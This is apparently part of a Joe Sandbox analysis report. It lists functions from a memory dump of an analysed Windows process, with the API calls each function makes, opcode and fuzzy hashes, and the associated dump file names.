Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 6a12f2e3939daa1bece2c971b0c8c6446c1f38efd1130e6768567293fcb7ee7c
Instruction ID: 7ace27999102b3f016e783dc78ca0cadcc6a011880f4eb4bc54a39b77452d812
Opcode Fuzzy Hash: 6a12f2e3939daa1bece2c971b0c8c6446c1f38efd1130e6768567293fcb7ee7c
Instruction Fuzzy Hash: C3A18A716043019FD724DF24C886B2AB7E1EB88714F14891DF99ADB392D7B4EC448B92

Function 0080BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00873700), ref: 0080BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,008A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0080BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,008A1270,000000FF,?,0000003F,00000000,?), ref: 0080BC36
_free.LIBCMT ref: 0080BB7F

Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0

_free.LIBCMT ref: 0080BD4B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 99f517d0c65d1908fe52fbc6ce8418abddff97eb558ad617f2a0fb32275e0463
Instruction ID: a6aabfd44a70ead8ba0d168cba1371bc773f7b9e39dc8ea71dd533f90c83847c
Opcode Fuzzy Hash: 99f517d0c65d1908fe52fbc6ce8418abddff97eb558ad617f2a0fb32275e0463
Instruction Fuzzy Hash: 6C510871900209EFEB50EFA99C85ABEB7BCFF41360F11426AE564D72D1EB709E408B51

Function 0083E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0083CF22,?), ref: 0083DDFD

Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0083CF22,?), ref: 0083DE16

Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A

lstrcmpiW.KERNEL32(?,?), ref: 0083E473
MoveFileW.KERNEL32(?,?), ref: 0083E4AC
_wcslen.LIBCMT ref: 0083E5EB
_wcslen.LIBCMT ref: 0083E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0083E650

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: b91baca6463b312e4ba439668bb12c3b66b7536ad0f4837066d3a78e76c03a6e
Instruction ID: 9919815346d7804bce73bbb215cb336cb2bad4b94f7453523ea2811b220d5172
Opcode Fuzzy Hash: b91baca6463b312e4ba439668bb12c3b66b7536ad0f4837066d3a78e76c03a6e
Instruction Fuzzy Hash: 295183B24087459BC724DB94D8859EFB7ECEFC4340F00491EF689D3191EF74A58887AA

Function 0085B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0085BB63
RegCloseKey.ADVAPI32(?,?), ref: 0085BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0085BBB3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 9ee9d163718aab840eea1485a372adfa2d62a9019cd786135ff36c0cd504057d
Instruction ID: 2ccaa2c44486ecd5bbb3a8be1ddc9c82817d699e0538601333b71591ffb3a0ea
Opcode Fuzzy Hash: 9ee9d163718aab840eea1485a372adfa2d62a9019cd786135ff36c0cd504057d
Instruction Fuzzy Hash: 07618C31208241EFD714DF24C494E2ABBE5FF84318F54855DF8998B2A2DB35ED49CB92

Function 00838BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00838BCD
VariantClear.OLEAUT32 ref: 00838C3E
VariantClear.OLEAUT32 ref: 00838C9D
VariantClear.OLEAUT32(?), ref: 00838D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00838D3B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 24a20db3196513e65e624e27818af10a205cdd3a5eaafd089d00d40b4b01a326
Instruction ID: 425b2f9e228a96fd76c375573769bb383a0268bc20cbfe24ec16f9c04b06aafa
Opcode Fuzzy Hash: 24a20db3196513e65e624e27818af10a205cdd3a5eaafd089d00d40b4b01a326
Instruction Fuzzy Hash: A65147B5A00219EFCB14CF68C894AAAB7F8FF89314F158559F905DB350EB34E911CBA0

Function 00848AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00848BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00848BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00848C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00848C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00848C5F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: ca517824c50980662af1cd81376e8a8dd69d2d0489e9aed193805bd3136f180a
Instruction ID: 61d0de38ce467a8ef396912553555582b261f7228826ca20ca343d0f95ceadc6
Opcode Fuzzy Hash: ca517824c50980662af1cd81376e8a8dd69d2d0489e9aed193805bd3136f180a
Instruction Fuzzy Hash: AB515A35A00219DFCB05DF65C884A6DBBF5FF48314F088059E84AAB362DB35ED51CBA1

Function 00858EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00858F40
GetProcAddress.KERNEL32(00000000,?), ref: 00858FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00858FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00859032
FreeLibrary.KERNEL32(00000000), ref: 00859052

Part of subcall function 007EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00841043,?,7529E610), ref: 007EF6E6
Part of subcall function 007EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0082FA64,00000000,00000000,?,?,00841043,?,7529E610,?,0082FA64), ref: 007EF70D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 6ec6981ea4483b56632af7e22a6259553a7b30d861e01afa1bda0fc4af9ea462
Instruction ID: 4e82d08cedc897426bc670ce55165b9d7162791eebff91b28ac4d84a410812c9
Opcode Fuzzy Hash: 6ec6981ea4483b56632af7e22a6259553a7b30d861e01afa1bda0fc4af9ea462
Instruction Fuzzy Hash: EA512935600245DFC715DF58C4948ADBBF1FF49315B0980AAEC4AAB362DB35ED89CB90

Function 00866B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00866C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00866C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00866C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0084AB79,00000000,00000000), ref: 00866C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00866CC7

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: e8da5136f5decd2a93564dc31c7f1bd4a12149bffbe012b7fc9269a0e1be9136
Instruction ID: b8b08d24a00213aeca5af239b4339d649611bca8924755320d388e7795f42e5e
Opcode Fuzzy Hash: e8da5136f5decd2a93564dc31c7f1bd4a12149bffbe012b7fc9269a0e1be9136
Instruction Fuzzy Hash: C841D635A04584AFDB24CF28CC59FB57FA5FB09364F160228F895E72E0E371AD61CA40

Function 00802051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008020C3
_free.LIBCMT ref: 008020E3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e9bdddf38ad54571e5b2218e53834f071da863af7b08141b1a097220df84aff7
Instruction ID: 26deb6b3402912def2d0ba03a5a17e54c6465d59b4ee11bc33a14275666d7848
Opcode Fuzzy Hash: e9bdddf38ad54571e5b2218e53834f071da863af7b08141b1a097220df84aff7
Instruction Fuzzy Hash: 0F41E132A00604DFCB20DF78CC88A5EB7B5FF89314F1545A9E615EB392DA71AD01CB81

Function 007E912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007E9141
ScreenToClient.USER32(00000000,?), ref: 007E915E
GetAsyncKeyState.USER32(00000001), ref: 007E9183
GetAsyncKeyState.USER32(00000002), ref: 007E919D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8c2c8a9d7e896fa3e91d1aa0ccb6d0cdf436cbfb77869c82b05265fa9de129ab
Instruction ID: 5c77d0dc55b3abd452984299c820b7d5fadd9084ce1bf90980e77aa802a823ee
Opcode Fuzzy Hash: 8c2c8a9d7e896fa3e91d1aa0ccb6d0cdf436cbfb77869c82b05265fa9de129ab
Instruction Fuzzy Hash: 7741613190855AFBDF159F69D848BEEB774FF09324F204219E529A32D0C7745D90CB51

Function 00843874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 008438CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00843922
TranslateMessage.USER32(?), ref: 0084394B
DispatchMessageW.USER32(?), ref: 00843955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00843966

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 81681e0811f55dee0a1fb6e5ecc518ee3e040ad39f33e2f577e67d5ecf76fe92
Instruction ID: d8aed37640d53bfe4ae4bd9a38933d9dd1894a7926a01ea8d4e2f4232ec67475
Opcode Fuzzy Hash: 81681e0811f55dee0a1fb6e5ecc518ee3e040ad39f33e2f577e67d5ecf76fe92
Instruction Fuzzy Hash: 6131A27090434A9EFF35CB75984CBB6BFA8FB17304F040569E4A2C29A0E7F49A85CB11

Function 0084CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0084CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0084CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFF2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: a8d70d7927af259521e06aef297c784b268173afec18a42334a5450b5e1cca32
Instruction ID: 1eef0b99a61d52a74a60a04fdfc7d779ea2821615e87fc99600fd0acd4873d8b
Opcode Fuzzy Hash: a8d70d7927af259521e06aef297c784b268173afec18a42334a5450b5e1cca32
Instruction Fuzzy Hash: EE317C71601209EFDB60DFA5C884AABBBFDFB14314B10442EF506D2201DBB8AE449B60

Function 00831901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00831915
PostMessageW.USER32(00000001,00000201,00000001), ref: 008319C1
Sleep.KERNEL32(00000000,?,?,?), ref: 008319C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 008319DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 008319E2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 595175a7e1510984a45d84e33cdb19f69f6bf0bcbc7de3b95161e24b23c19142
Instruction ID: 96290250ead829fdda8c80b5262d804e2e9dece0de48b46a2bd86cc1bc305324
Opcode Fuzzy Hash: 595175a7e1510984a45d84e33cdb19f69f6bf0bcbc7de3b95161e24b23c19142
Instruction Fuzzy Hash: 8B318C71A00219AFCB04CFA8C999BAE3BB5FB45715F504229F961E72D1C7B09954CB90

Function 00865706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00865745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0086579D
_wcslen.LIBCMT ref: 008657AF
_wcslen.LIBCMT ref: 008657BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00865816

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 38a5aa81f7189a9fe0211fae387d8ca230a0a4ef595d596c23c6c9da2385154c
Instruction ID: b47482522c79b97125905bc87a323f167c7214f2307f8bdc7c1b348f01b45eb3
Opcode Fuzzy Hash: 38a5aa81f7189a9fe0211fae387d8ca230a0a4ef595d596c23c6c9da2385154c
Instruction Fuzzy Hash: D521B67190461CDADB208F60CC84AEE7BB8FF04724F118256F929EB280DB749985CF50

Function 007E990F Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007E98CC
SetTextColor.GDI32(?,?), ref: 007E98D6
SetBkMode.GDI32(?,00000001), ref: 007E98E9
GetStockObject.GDI32(00000005), ref: 007E98F1
GetWindowLongW.USER32(?,000000EB), ref: 007E9952

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 6eddec52540ae05a32eee16e056dd7ec444d00866516f95f8b8ee3c3bb5505de
Instruction ID: bf8de58bf2b48a27cbf325c333f37efa6b1c1b5f438e338e3cddc7ee0a493e85
Opcode Fuzzy Hash: 6eddec52540ae05a32eee16e056dd7ec444d00866516f95f8b8ee3c3bb5505de
Instruction Fuzzy Hash: 8D2126724462D09FCB228F36EC58AE53FA0AF5B331F09019DE6928A1A2D77D5990CB50

Function 00850930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00850951
GetForegroundWindow.USER32 ref: 00850968
GetDC.USER32(00000000), ref: 008509A4
GetPixel.GDI32(00000000,?,00000003), ref: 008509B0
ReleaseDC.USER32(00000000,00000003), ref: 008509E8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 93e01f550b55d523f1487c698deaea09021a4f99817c26ccca3726e8444b4c98
Instruction ID: 6ea83cb1a64d0a839caaa5c9ad13f3dc30082e7346128be0ff4ee43adf4f58bc
Opcode Fuzzy Hash: 93e01f550b55d523f1487c698deaea09021a4f99817c26ccca3726e8444b4c98
Instruction Fuzzy Hash: AE215E35A00204AFD704EF69D888AAEBBF5FF58701F05806DE84AD7352CA74AC44CB50

Function 0080CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0080CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0080CDE9

Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0080CE0F
_free.LIBCMT ref: 0080CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0080CE31

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d763238c30efed94a8dc3c56f716537dc803184f71ad1bc49c3431777e63f43b
Instruction ID: 37c45910c2738f3263cfdd9373546b5702ca26e6cd0eface0628250e15a3ac5f
Opcode Fuzzy Hash: d763238c30efed94a8dc3c56f716537dc803184f71ad1bc49c3431777e63f43b
Instruction Fuzzy Hash: AC0175726012157FA3611FBAEC4CD7B796DFEC6BA13150229FD05D6281DA618D0191B1

Function 007E9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

